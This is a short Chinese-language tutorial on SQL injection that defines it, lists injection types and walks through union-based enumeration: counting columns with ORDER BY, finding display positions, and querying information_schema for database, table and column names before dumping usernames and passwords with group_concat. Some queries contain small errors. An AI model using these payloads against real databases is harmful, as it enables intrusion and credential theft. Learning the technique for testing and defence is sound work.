谈谈sql注入的那些事

sql注入

？什么是sql注入

利用数据库管理系统的能力，攻击者通过将构造的SQL playload附加到前端提交的参数中，导致后台拼接后的SQL语句，被数据库执行产生预期外效果

？sql注入的分类

总体说分两类：数据型注入和字符型注入

按照其他分类方法，还有常见数据库注入：盲注，延时注入，宽字节注入，二次注入，堆叠注入

？如何发现sqli注入漏洞

1.寻找注入点：
一个可以和后台，数据库交互的地方

2.判断后台列数：
用order by 查找前面select的列数
3.寻找显示位：
用id =-1 union select 1,2,3,4 查找显示的地方
4.寻找库名：

select database（）；

select schema from information_schema； 可以找到所有的数据库库名

5.找表名：

select table_name from information_schema.tables where table_schema=“security”；

6.找字段名：

select column_name from information_schema.columns where table_schema=“库名” and table_name=“表名”；

group_concat(concat_ws(",",username,password)) from database.table limit 0,5;

补充：

mysql数据库中的infomation_schema数据库：

在MySQL中，把 information_schema
看作是一个数据库，确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等。

sql注入中常用的几个表：

schemate 表：提供了当前mysql实例中所有数据库的信息

tables表：提供了关于数据库中表的信息。

columns表：提供了表中列的信息